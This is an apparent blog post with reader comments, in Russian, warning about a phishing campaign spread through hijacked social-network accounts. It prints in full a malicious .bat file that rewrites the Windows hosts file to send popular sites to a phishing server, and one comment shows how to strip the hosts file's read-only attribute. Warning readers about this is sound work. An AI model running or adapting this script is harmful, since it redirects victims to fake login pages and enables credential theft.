Фарминг в соц. сетях

    Похоже, началась очередная эпидемия фарминга через социальные сети.

    В одной из известных популярных социальных сетей (а может, и не в одной?) через систему личных сообщений друзьям рассылаются сообщения вида:
    У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?

    На что человек, конечно же, получает ответ:
    Могу, привет)

    И через некоторое время получает следующее сообщение:
    urlshort.me** фaйл без oшибoк зaпускaеться?))

    (адрес закрыл звёздочками специально, чтоб неповадно было щёлкать:)

    Как человек, наученный жизненным опытом (в том числе и своим), сходил по ссылке браузером в режиме инкогнито. Сокращённая ссылка ведёт на один из популярных файлообменников, с которого предлагают скачать файл qip_unfium.bat

    Ничего не подозревающий пользователь щёлкает по этому файлу, желая помочь другу разобраться с проблемой с Квипом Унфиумом, и… выполняется следующий код:
    @rem ----- ExeScript Options Begin -----
    @rem ScriptType: console
    @rem DestDirectory: temp
    @rem Icon: default
    @rem ----- ExeScript Options End -----
    @echo off
    echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
    echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts


    Кстати перед собственно телом скрипта в файле 662 пустые строки.

    О последствиях выполнения данного скрипта можно не упоминать.

    Мораль? В стотысячный раз напоминаю: остерегайтесь подделок и уточняйте у друзей, а действительно ли они присылали вам такую ссылку.

    UPD от 16 ноября 2009 года: Вторая часть Марлезонского балета. :-)
    Share post

    Similar posts

    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 137

      +6
      В принципе ничего нового.
      Разве что фишка с двумя сообщениями. Хотя я думаю он даже не дожидается ответа а просто отсылает сначала одно сообщение а через минут 5-10 второе
        +14
        Скорее всего. В промежутках я переписывался с обладательницей аккаунта.
        — Здравствуй ) У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?
        — Могу, привет)
        — Дима, извини, это не я. Наверное, меня взломали, хотя ссылок никаких не приходило
        — Ok :) Аккуратнее в будущем :)
        — Дим, как так? я поставила супер-длинный пароль)))
        — Ну, по-разному бывает. Бывают левые сайты, использующие дыры вконтакте. Бывают невнимательные пользователи, которые сами отдают свои пароли поддельным сайтам ;)
        — ага, спасибо.Но именно этот пароль я нигде не писала)))
        urlshort.me/** фaйл без oшибoк зaпускaеться?))
        — А вот это уже не ты, да?
          –1
          Интересно, кстати, как это работает — украли куки или отправляют сообщения через XSS?
            0
            куки скорее всего
              0
              скорее просто инжект в сессию, пока пользователь на сайте какое-нибудь BHO рассылает личные сообщения
                0
                просто инжект в сессию

                Поясните, что вы имели в виду.
                  0
                  ну во всяких фейсбуках и тп
                  даже если кто-то утянет пароль, то войдя из другого места ему зададут вопрос, например дату рождения, то есть в аккаунт не попасть

                  собственно именно поэтому спамеры и делают инжект своего ява-скрипт кода в активную сессию, вы заходите на фейсбук, а в страницу троян дописывает яваскрипт код, который вызывает функцию отправки личного сообщения, проще некуда :)
                    +1
                    SCRF штоле?
                      +1
                      чего простите? :)
                        +1
                        Cross Site Request Forgery.
                        Перечитав ваш пост еще раз я понял что это не он :)
              0
              Ну тут куки тырят полюбому.
              Тем более что куки вконтакте по умолчанию действуют месяц и не привязаны к IP

              Хотя можно и в какой-то момент пароль запросить…
              –2
              Весьма странно это читать было. Надо прекращать смотреть хауса…
                +6
                Расскажите, пожалуйста, тем, кто не в теме (в т.ч. мне), при чём тут Хаус?
            +11
            Если не ошибаюсь, то в Microsoft Vista и выше UAC должен защитить от подобных скриптов, т.к. операции над hosts требуют повышения прав. Хотя большинство пользователей принудительно вырубают у себя UAC мол чтоб «не мешал».
              0
              Сейчас попробую на Win7.

              Ну и не стоит забывать, что действительно у многих либо выключен UAC, либо отсутствует.
                +11
                Я лучше лишний раз нажму на кнопочку, но буду точно знать что данное приложение, которое запросила повышение прав, запустил сам, а не какой-либо посторонний «гость», чем потом в панике менять пароли везде.
                  0
                  Оно и верно.
                    +3
                    А я лучше поставлю касперского или еще чего-нибудь, и не буду тыкать каждый раз кнопочку. У меня от таких кнопочек потом глаз дергается :|
                      +3
                      Я больше себе доверяю, особенно когда в антивирусы попадают сигнатуры вполне безопасных программ. К примеру Inno Setup.

                      Да и необходимость нажать на ту кнопочку возникает раз в пятилетку, не каждый день устанавливаю пачки программ и выполняю действия, требующие подтверждения.
                        +3
                        Ох, закидают меня сейчас… )) Лучше поставить linux и не париться по таким мелочам :)
                        Ну можно хотя бы для сёрфинга в сети его использовать, в этом отношении пользователю и привыкать особо не придётся после винды…
                          0
                          вы когда говорите лучше — уточняйте: лучше для кого?
                            +1
                            Ну я говорил про себя, хотя и неопытному юзеру не помешает, если ему кто-нибудь для инета поставит и настроит названную ОС :)
                              –2
                              неопытный юзер офигеет от Линукса, даже от довольно дружелюбной Ubuntu.
                              Это, например, жене можно ставить Ubuntu при условии что сам в нем разбираешся, а поставить среднестатическому юзеру Ubuntu и бросить его с ней один на один, он же будет в ужасе.
                                +1
                                От Убунты? Весь «ужас» юзера происходит исключительно от вот таких расхожих мнений «Линукс это очень сложно» — описание процесса — клик а меню «Приложения»-«Интернет»-«Браузер Firefox» (услужливо выводит подсказку) — ни на йоту не сложнее чем в редмондской поделке.

                                Подключение к сети не сложнее чем в Винде, сложные случаи и там и там требуют определенных знаний.
                                Установка приложений бесконечно проще чем в Виндах.
                                Придерживаюсь мнения, что абсолютное большинство людей, пересказывающих Линукс-страшилки — предмет обсуждения ни разу в жизни не видели.
                                  0
                                  +1 У самого есть несколько абсолютных чайников на Убунте которые с удовольствием торренты качают и диски пишут.
                                  0
                                  Как-то раз оставил я своей девушке ноут с Ubuntu а сам ушел на работу.
                                  Когда вернулся, услышал примерно следующее «Хм, и что сложного в этом Linux'е… фильмы посмотреть можно, в интернете посидеть можно, вроде все понятно...»
                                  Так что неопытный пользователь не всегда офигевает от линукса =)
                                    0
                                    Ну, я свою жену и её сестру тоже пересадил на Убунту.
                                    Просто снеся винду на их компах :))

                                    Для интернета, музыки, фильмов, торрентов, учёбы в школе/универе хватает — не жалуются. :)
                                    0
                                    Прошу пример из реальной практики, от которой среднестатистический(вы сами это сказали) юзер был в ужасе.
                                      0
                                      Ну, например, попробуйте набрать какой-нить доклад или диплом (с таблицами и прочими рюшечками) под Ubuntu в том же OpenOffice… Посмотрел бы я на вас, когда потом этот ваш диплом с горем пополам откроется в MS Office 2007. И дело вовсе не в расширении файла, а именно в совместимости открытого и закрытого ПО.
                                      Я описал лишь один из примеров ужаса…
                                        0
                                        Ну тащемта я диплом писал как раз в OO Writer — в 2007 офисе открылось именно с таким форматированием как нужно. В свою же очередь знаю примеры, когда людей вообще не видевших никаких линуксов сажали за убунту на работе, и они вполне замечательно ей пользовались. Некоторые даже говорили что поставили после этого на домашние машины.

                                        А вообще спасибо за подъем некропоста полуторалетней давности ;)
                                          0
                                          Вот блин… видимо я загулялся по хабру и не посмотрел на дату :(
                                0
                                Как правило аккаунты угоняют совсем не у тех кому лучше или не лучше ставить линукс.
                            +1
                            Попробовал. Действительно: «Отказано в доступе»
                            И то радует. :)
                              0
                              Попробовал выполнить в консоли, при том что хоть и являюсь администратором на компьютере:

                              C:\Users\alex>echo 192.168.1.1 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
                              Отказано в доступе.

                                0
                                UAC, да.
                                  –1
                                  Потому что консоль без прав админа, т е надо сначала запустить админскую консоль (правой кнопочкой на cmd.exde — выполнить от имени) а потом запускать скрипт!
                                    0
                                    А может, лучше не надо? :)

                                    Тут вообще об этом и пишут, что UAC по умолчанию не даёт совершиться злодеянию.
                                  +5
                                  А даже у тех, у кого включен, просто жмут «Да»… не вчитываясь и не осознавая что вообще нажимают.
                                    +7
                                    Ну и сами себе злобные буратины, вполне заслужили потерю своего уютненького вконтактика.
                                  +6
                                  пошел включать UAC ^_^
                                    –4
                                    Exactly :) Первое, что делаю — вырубаю UAC. Очень уж навязчивый.
                                    С другой стороны и всякую херню не щелкаю :)
                                      +14
                                      И машину на сигнализацию не ставлю, без ключа-то ее все равно не завести. ;)
                                        +3
                                        Именно! И квартиру с распахнутой дверью оставляю — все равно ведь никто не знает, где деньги лежат :)
                                          +8
                                          Все знают, что денег нет. :)
                                        +2
                                        А заминусовали то уж прям, праведные умники все из себя такие. Ни разу никто UAC в Windows'е не вырубил?
                                          +1
                                          Не выключал и другим объясняю, что не просто так он нужен.
                                            +2
                                            Вы — вполне возможно. Я говорил за себя, и, сдается мне, не такой уж это смертельный грех — отключение UAC.
                                              +1
                                              Если знаешь что он делает — вырубай наздоровье. А если ты домохозяйка, то лучше пусть работает.
                                                +5
                                                «ой оно что-то тут спрашивает. я когда квип ставила он тоже чёто спрашивал, пока да не ответила не установилось. отвечу да на всякий случай.»
                                                  0
                                                  Вы первый, кто уловил мессадж! Именно об этом я и пытался сказать. Не потому что так надо, а потому что просто я так делаю, не более.
                                                    0
                                                    я знаю, что он делает, поэтому не вырубаю.
                                                +1
                                                Нет.
                                                Я даже ругалась с внутренними службами, которые не хотели выпускать патч к внутри-корпоративному софту что бы в Vista работал, но при этом требовали соблюдения информационной безопасности.

                                                Кстати, патч так и не выпустили, а мне это дало повод не заниматся всякой «чушью».
                                                  0
                                                  Нет. Посидел я с правами администратора в XP, даже если ты сам сисадмин, и антивирус хороший, то от таких вот «афганских вирусов» спасет только UAC.
                                                  оффтопик: UAC еще с DooMа пошло
                                                +1
                                                И XP с ограниченным пользователем не даст такое сделать, но большинство же под root'ом сидят
                                                0
                                                Ну да: идея не нова.
                                                  0
                                                  И это доказывает новая волна спама, предлагающего узнать всю переписку друзей, знакомых, перехватить смс…
                                                  Да и если серьёзно, предупреждать уже в (даже не знаю какой по счёту раз) бесполезно.
                                                  Те, кто обжигался и больше не хочет этого повторять ссылки по сообщениям в контакте открывает только если просили их себе прислать а «проверить файл» могут и договорившись в аське например.
                                                    0
                                                    А что выполняется по адресу 81.94.229.115, который вы так предусмотрительно указали?
                                                      0
                                                      Там видимо поддельные страницы для каждого из сервисов: одноклассники, контакт, почтовики и тп…
                                                      Ничего не подозревающий пользователь вводит свой логин и пароль и отдает их тем самым злоумышленнику.
                                                        +1
                                                        Вообще, и браузер, и wget отдаёт пустоту.
                                                        Думаю, что там просто ловят куки и всё. :)
                                                          –2
                                                          serzhenko@serzhenko ~/Загрузки $ wget 81.94.229.115
                                                          --2009-10-27 15:39:09-- 81.94.229.115/
                                                          Устанавливается соединение с 81.94.229.115:80... соединились.
                                                          Запрос HTTP послан, ожидание ответа... 200 OK
                                                          Длина: 0 [text/html]
                                                          Сохраняется в каталог: `index.html'.

                                                          [ <=> ] 0 --.-K/s в 0s

                                                          2009-10-27 15:39:09 (0,00 B/s) - `index.html' сохранён [0/0]
                                                            +3
                                                            а теперь честно добавьте перенаправление в /etc/hosts попробуйте еще раз wget vkontakte.ru
                                                              0
                                                              Кстати очень качественная копия :)

                                                              занеимением акка на вконтакте спокойно пообщался с сайтом.
                                                              +5
                                                              а предоставить серверу Host к которому обращаетесь не пробовали?
                                                                0
                                                                Обойдутся )))

                                                                А серьёзно — не до того на работе было :(
                                                                0
                                                                адрес лежит. хабраэффект? =)
                                                                  +2
                                                                  хабраабуз
                                                                0
                                                                Хотел погуглить ip адрес, да благодаря моим кривым рукам, да предусмотрительному Хрому и его «Вставить из буфера и перейти», багополучно зашел на 81.94.229.115 основным браузером в обычном режиме.

                                                                К сожалению я не web программист, но насколько я понял, деструктивного кода там нет, а cookies так просто не стырыть, если я перехожу по ip?
                                                                  +2
                                                                  да вы правы. ничего страшного не произошло.
                                                                  0
                                                                  porfel@porfel-laptop:~$ telnet 81.94.229.115 80
                                                                  Trying 81.94.229.115…
                                                                  Connected to 81.94.229.115.
                                                                  Escape character is '^]'.
                                                                  GET / HTTP/1.0
                                                                  Host: vkontakte.ru
                                                                  Connection: close

                                                                  HTTP/1.1 200 OK
                                                                  Date: Tue, 27 Oct 2009 16:01:22 GMT
                                                                  Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4
                                                                  X-Powered-By: PHP/5.2.4
                                                                  Content-Length: 130
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=windows-1251


                                                                  Connection closed by foreign host.
                                                                  porfel@porfel-laptop:~$
                                                                    0
                                                                    Тьфу, млин, парсер — лох =)
                                                                    porfel@porfel-laptop:~$ telnet 81.94.229.115 80
                                                                    Trying 81.94.229.115...
                                                                    Connected to 81.94.229.115.
                                                                    Escape character is '^]'.
                                                                    GET / HTTP/1.0
                                                                    Host: vkontakte.ru
                                                                    COnnection: close

                                                                    HTTP/1.1 200 OK
                                                                    Date: Tue, 27 Oct 2009 16:01:22 GMT
                                                                    Server: Apache/2.2.4 (Win32) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.4
                                                                    X-Powered-By: PHP/5.2.4
                                                                    Content-Length: 130
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=windows-1251


                                                                    Connection closed by foreign host.
                                                                    porfel@porfel-laptop:~$
                                                                      +1
                                                                      Короче парсер совсем лох =(
                                                                      Отдает html со страницей ./fakes/vkontakte/index.html
                                                                        –5
                                                                        вы и с парсером не справились и кажется веткой обсуждения немного промахнулись :-)
                                                                          +1
                                                                          Не, ну человек же пишет что пустая страница при заходе на IP — вот я и пытался показать что пустая она только в том случае, если Host не указан =)
                                                                        0
                                                                        В HTTP 1.0 не предусмотрен заголовок Host. Попробуйте HTTP/1.1.

                                                                          0
                                                                          Тем не менее и с 1.0 прокатило =)
                                                                    0
                                                                    Верно, т.к. вы что запрашиваете? ip.address/?
                                                                    Они ждут
                                                                    GET vkontakte.ru HTTP/1.0

                                                                    p.s. сорри, http 1.1 по памяти не помню.
                                                                      0
                                                                      Кстати то ли его отключили, то ли много желающих посмотреть: )
                                                                        0
                                                                        Отключили после абузы в саппорт хостеру =)
                                                                        В этой ветке подробности.
                                                                  0
                                                                  Обычно там копии сайтов с информацией, о том что сервис стал платным и нужно отправить смс сообщение на указанный номер.
                                                                    0
                                                                    Они ещё логины с паролями утаскивают — фишинг…
                                                                    Двух зайцев убивают.
                                                                  –10
                                                                  в очередной раз убеждаюсь, что соц.сети — зло.
                                                                  и неимоверно радуюсь тому факту, что я хотя и зарегистрирован в популярных сетях (а кто у нас безгрешен?), но не сижу там сутками напролет. Как результат — мне ничего не приходит.
                                                                  ЗЫ Ну и думать, что и как ты качаешь, безусловно, тоже необходимо.
                                                                    +9
                                                                    Причем тут соцсети? Речь, в который уже раз, идет о глупости человеческой. Защиты от нее нет. Ни UAC, ни фаерволы и антивирусы не помогут если человек не понимает что вообще происходит. Все эти вопросы системы UAC и прочего — вы в самом деле думаете что люди понимают что там написано? В лучшем случае до них доходит что их просят нажать «да» чтобы выполнить действие, а в худшем зависают и звонят знакомому\рандомно жмут на кнопки.

                                                                    Именно потому что для основной массы населения комп — непонятная железяка, мы и не избавимся от таких «хаков». И бесполезно призывать людей к обучению, им просто нафиг это не надо. Более того, люди не ценят свою инфу, поэтому обращаться к разбирающемуся человеку не будут, пока инфа не будет потеряна. И ничего мы тут не сделаем, мы можем только зарабатывать на восстановлении инфы, переустановке оси и т.п.

                                                                    P.S. Извините, наболело.
                                                                      –3
                                                                      соц.сети — это среда. Среда, в которой много чего происходит, и к которой применимы методы социальной инженерии.
                                                                      Если вы не являетесь «жителем» этой среды, то вам побоку то, что там происходит.
                                                                      а в остальном — всецело с вами согласен.
                                                                        0
                                                                        То, что творят через соцсети точно также можно использовать через аську, мыло, через любые средства коммуникации. Методы одинаковые, завязаны на глупости человеческой.
                                                                        0
                                                                        Согласен. *лаконично*
                                                                          0
                                                                          А он и должен быть таким. Как утюг, DVD проиграватель.
                                                                          Я за редким исключением в инструкцию лезу и мне как пользователю подобной техники уж совсем не нужно изучать методы записи на болванки, сопративление в различных материалах и прочее.

                                                                          Компьютер в наше время тот же утюг — можно и бо-бо получить и в круглую сумму попасть, если страховки нет.

                                                                            +1
                                                                            >А он и должен быть таким. Как утюг, DVD проиграватель.

                                                                            Комп никому ничего не должен. Он есть и все.

                                                                            Создавался он как универсальная система и именно благодаря этому вы можете смотреть фильмы, рассчитывать физмодели, сидеть в инете и играть в игры на одном и том же устройстве, в отличие от вашего dvd-проигрывателя или утюга, которые умеют выполнять всего одну функцию. Интернет-технологии также заточены под универсальность.

                                                                            Именно поэтому для безопасной работы за компьютером надо обладать некоторым объемом знаний чтобы понимать что там происходит, ибо это сложная система. Причем, заметьте, вас никто не просит вникать в тонкость протоколов передачи данных или в устройство ядра ОС. Требуется знать общие понятия и принципы работы. А также мозги — это самое важное, но об этом постоянно забывают.

                                                                            Чтобы когда вам придет очередное сообщение прислать смс вы посмотрели официальную инфу по этому поводу, а не полезли отправлять смс.

                                                                            Чтобы когда вам предложат прочитать смс друга вы задумались, а где гарантии что вас не обманут?

                                                                            Чтобы когда вам пришлют файл xxx.bat вы понимали что это — программа и стоит проявить осторожность, в частности — узнать у вашего знакомого что это за программа, где он ее взял, а после этого проверить на безопасность у ближайшее подкованного знакомого. Да, да, тут придется обращаться к тем, кто в теме. Как и для тонкой настройки фаервола например. Потому что комп — это вам не dvd-проигрыватель и мануалы к нему толще на порядки.
                                                                              0
                                                                              > Создавался он как универсальная система и именно благодаря этому вы можете смотреть фильмы, рассчитывать физмодели, сидеть в инете и играть в игры на одном и том же устройстве, в отличие от вашего dvd-проигрывателя или утюга, которые умеют выполнять всего одну функцию. Интернет-технологии также заточены под универсальность.

                                                                              Совроеменные яблочные телефоны тоже многое могут, но вирус там одним кликом не зщапустишь. Индусы, написавшие винду — криворукие инвалиды. ничего не смыслящие в компьютерной безопасности + сама винда сегодня недалеко ушла в плане интерфейса от 95-й, своих толковых идей у микрософтовцев нет.

                                                                              Пользователь *хорошего* компьютера не должен заморачиваться на знние что такое бат-файл, и не должен платить антивирусным компаниям, все должно работать само.
                                                                          +1
                                                                          Хабрахабр, афаик, тоже соц.сеть ;)
                                                                            0
                                                                            возможно, так оно и есть.
                                                                            но эта сеть специализированная и поэтому описанная выше ситуация вряд ли тут возможна.
                                                                              0
                                                                              Вы просто так категоричны…
                                                                                +1
                                                                                А я пробовала — работает.
                                                                                Как-то шутила с коллегами, рассылая им письма с картинкой, но мне лениво было парсить заголовки запроса, что бы отдавать картинку похожую на пользовательский интерфейс. Но, могу сказать, что любого можно обмануть.
                                                                              +3
                                                                              Новость: В Барнауле молотком убили старушку.

                                                                              Сомеван:
                                                                              в очередной раз убеждаюсь, что молотки — зло.
                                                                              и неимоверно радуюсь тому факту, что я хотя у меня и есть молоток (а кто у нас безгрешен?), но я не стучу им сутками напролет. Как результат — никого ещё не убил.
                                                                                0
                                                                                когда по 12 часов в сутки молотками начнут стучать 12-летние школьники и блондинки с большими голубыми глазами, я ожидаю многочисленные жертвы среди гражданского населения.
                                                                              0
                                                                              а потом такие друзья предлагают узнать всю правду о партнере, через чтения чужих смс…
                                                                              Неужели кто-то покупается?
                                                                                +1
                                                                                а в Латвию провайдеру кто нидь уже написал абузу?
                                                                                  0
                                                                                  и будем надеяться что там не абузостойкий хостер
                                                                                    +3
                                                                                    Хоть в английском и не силен, но вот такую штуку отправил:

                                                                                    Hello!
                                                                                    It is noticed that one of the clients of your hosting account used to collect passwords (phishing) from a variety of services — social networks, email systems, etc.
                                                                                    IP-address of the phising server: 81.94.229.115
                                                                                    Take action.
                                                                                    Thank you.
                                                                                      +1
                                                                                      Ой, я тоже им написал, правда на латышском =)
                                                                                        +1
                                                                                        Уже ответили и спросили есть ли у меня какие-нить логи по этому поводу.
                                                                                        Ответил содержимым батника =) Ждем дальше.
                                                                                          0
                                                                                          Впринципе, они одна из самых адекватных хостинг контор у нас, думаю, что совсем быстро всё разрешится…

                                                                                          Думаю им бы еще логи распространения _этого_, иначе какая разница, что сервер отдает на определенные поля host.

                                                                                          P.S.: сделал себе на время запись на yandex, стёр все куки, зашел, а там просто ошибка php, в сорсе еще две ссылки на файлы, которые также не работают… (а как хотел проверить поисковик))
                                                                                          Но это еще ладно, но смутило то, что сервер на винде (судя по диску Z:\home\… так что, думаю, что даже не владелец сервера в этом виноват (а вот в том что нет антивиря, точно он!)
                                                                                            0
                                                                                            Да что-то не понял я ихней адекватности:

                                                                                            «Hello,
                                                                                            we informed our client about this problem.»

                                                                                            Это типа «мы сказали хакеру что он хакер»?
                                                                                            Ппц.
                                                                                              0
                                                                                              Так совершенно необязательно, что латышский хостер и есть то юрлицо, у которого говнари брали хостинг. Скорее всего, идет реселл до более мелкой VPS-конторы, которую и имеют ввиду под «клиентом».
                                                                                                0
                                                                                                Так и есть, латышскому хостеру респект, бобик сдох:
                                                                                                «Hello,
                                                                                                no, user is large company.
                                                                                                now we block this IP address and again informed our client.»

                                                                                                Победа хабра над злом =)
                                                                                                  0
                                                                                                  Осталось подсчитать, сколько блонди купилось на халявную жвачку
                                                                                    +2
                                                                                    Я, конечно, сори, но может просто поставить файл hosts в режим «только для чтения»...?
                                                                                      0
                                                                                      он так и стоит by default
                                                                                        0
                                                                                        Ну никто не мешает его также просто снять :)
                                                                                          +1
                                                                                          UAC почти тоже самое и делает, но дело в том, что RO аттрибут обрабатывается на системой, а приложениями и по большей части не более чем флаг.
                                                                                            +2
                                                                                            Положение файла hosts можно поменять: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath
                                                                                              0
                                                                                              Ну, будучи параноиком, я могу возразить, что можно считать из реестра местоположение файла hosts. Хотя никто из фишеров заморачиваться не будет, но это не защита все равно, имхо.
                                                                                                0
                                                                                                не помогает, чтоб вы себе не сомневались ;)
                                                                                                  0
                                                                                                  Я к тому, что злоумышленник может поменять местоположение :)
                                                                                                    0
                                                                                                    ну и что, смена этого ключа в реестре ничего не дает на Windows XP SP3
                                                                                                    Image #705782, 87 KB
                                                                                              0
                                                                                              А вместо поисковиков там что показывается?
                                                                                                0
                                                                                                Я думаю немногие хабраюзеры поведутся на такое. Это предупреждение распространить бы на «широкие массы».
                                                                                                  0
                                                                                                  Говорилось уже не один раз. И каждый юзер подозревает, что живет не в идеальном мире. Все без толку — велись и будут вестись.
                                                                                                  +1
                                                                                                  Кстати, все ссылки на их сайте имеют вид
                                                                                                  %site_name%/fakes/%site_name%/…

                                                                                                  Ребята не палятся совершенно :)
                                                                                                    0
                                                                                                    продвинутые/внимательные пользователи итак заметят подмену, а остальным как правило пофигу.
                                                                                                    0
                                                                                                    Буквально сегодня зовёт меня мама и говорит: «посмотри, что мне друг в одноклассниках написал… можешь сделать, что он просит?»

                                                                                                    Смотрю сообщение, а там: «скинь смс 2196 255 нa 3649 надеюсь тебе понравится, этo мoй сюрприз для тебя, не посмотришь, я обижусь». Написано действительно от имени близкого друга.

                                                                                                    Отправлять СМС я ее, само собой, разубедил, но был крайне удивлен… во-первых, тем, что она изначально повелась, во-вторых, что подобные сообщения стали рассылать через социальные сети, используя взломанные аккаунты друзей.
                                                                                                      0
                                                                                                      Так ведь пароли от аккаунтов сами по себе бесполезны… Вот их сначала фармят, а потом и используют.
                                                                                                      –1
                                                                                                      «запускаеться», блять…
                                                                                                        +2
                                                                                                        Ну, бот-спаммер неграмотный, что ж поделать…
                                                                                                        0
                                                                                                        Я неделю назад уже исправлял у друга ситуацию.
                                                                                                        Кажется подобное бродит по интернету с тех пор как появился контакт
                                                                                                          0
                                                                                                          В последней версии альтернативной ОС уже не принято работать под администратором?
                                                                                                            0
                                                                                                            Даже в предпоследней было.
                                                                                                            0
                                                                                                            Видел такую вещь у знакомой, проверял все антивирусом вдоль и поперек — все хорошо. В результате посоветовал не пользоваться вконтакте — тоже вариант :)
                                                                                                              0
                                                                                                              мне сегодня RU-NIC пришло фишинговое письмо с предложением ввести пароль/логин почты для прочтения «скрытого» письма
                                                                                                              :)
                                                                                                                +1
                                                                                                                Отличная статья на тему фарминга и его основных техниках av-school.ru/article/a-107.html
                                                                                                                • UFO just landed and posted this here
                                                                                                                    +1
                                                                                                                    Ага, щас, стоит только в начало вышеуказанного скрипта добавить что-то вроде:

                                                                                                                    attrib -r -h %windir%\system32\drivers\etc\hosts

                                                                                                                    и все пути открыты
                                                                                                                    +1
                                                                                                                    Если пользователь отключил UAC — сам виноват.
                                                                                                                    Если пользователь не отключил UAC но жмет OK по инерции — сам виноват.

                                                                                                                    В 99,99% случаях виноват сам пользователь. Один раз угонят аккаунт таким образом, на будущее будем думать. Если конечно умеет учиться на своих ошибках.
                                                                                                                      –2
                                                                                                                      > Если пользователь отключил UAC — сам виноват.

                                                                                                                      Если у пользователя в системе нет UAC? А если UAC его достал? Блин, я не понимаю, защищаете кривую идусскую, поделку, которая из-за совместимости в пред. версиями больна кучей наследственных болезней, вместо того, чтобы честно припзнаоь что система не годится для нормального домашнего пользователя. МС всегда приоритетом ставила корпоративного клиента, а домашний юзер ей безразличен (не верите — посмотрите на сообщения об ошибках типа обратитесь к вашему сис. администратору, ну кто домой нанимает отдельного админа :) ). Вот и имеем то, что имеем.
                                                                                                                        0
                                                                                                                        В 7 UAC работает вполне. Если нет UAC должен быть антивирус, который в большинстве случаев защитит компьютер. Если нет ни UAC, ни антивируса, то хозяин такого компа сам себе злобный буратина.
                                                                                                                    • UFO just landed and posted this here
                                                                                                                        0
                                                                                                                        А вот и продолжение банкета ;)

                                                                                                                        Only users with full accounts can post comments. Log in, please.